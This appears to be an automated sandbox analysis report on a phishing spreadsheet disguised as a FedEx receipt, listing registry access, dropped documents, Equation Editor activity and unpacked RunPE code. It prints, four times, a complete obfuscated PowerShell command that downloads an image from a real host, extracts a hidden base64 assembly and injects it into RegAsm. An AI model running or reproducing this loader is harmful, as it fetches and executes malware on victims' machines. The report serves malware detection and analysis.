Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp

Source: ~DFE1D622D06AD63FEF.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: FedEx Receipt_53065724643.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

.NET source code contains potential unpacker

Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_002A21D8 push ebx; iretd	10_2_002A21EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00414023 push esp; iretd	12_2_0041403D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004021C2 push ebp; ret	12_2_004021CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402209 push ebp; ret	12_2_004021CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00411B15 push ss; retf	12_2_00411B46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403400 push eax; ret	12_2_00403402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041A408 pushfd ; ret	12_2_0041A409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00404D15 pushfd ; iretd	12_2_00404D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00408605 push ss; retf	12_2_0040861C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040773F push edx; iretd	12_2_0040774B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239DFA1 push ecx; ret	12_2_0239DFB4

Source: 10.2.powershell.exe.280000.0.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.280000.0.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\ilang.in\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\ilang.in\DavWWWRoot			Jump to behavior

AI detected suspicious Excel or Word document

Source: Office document

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File dump: ima.imim.im.imim[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: DD4612E1.doc.4.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,

7_2_036407AB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
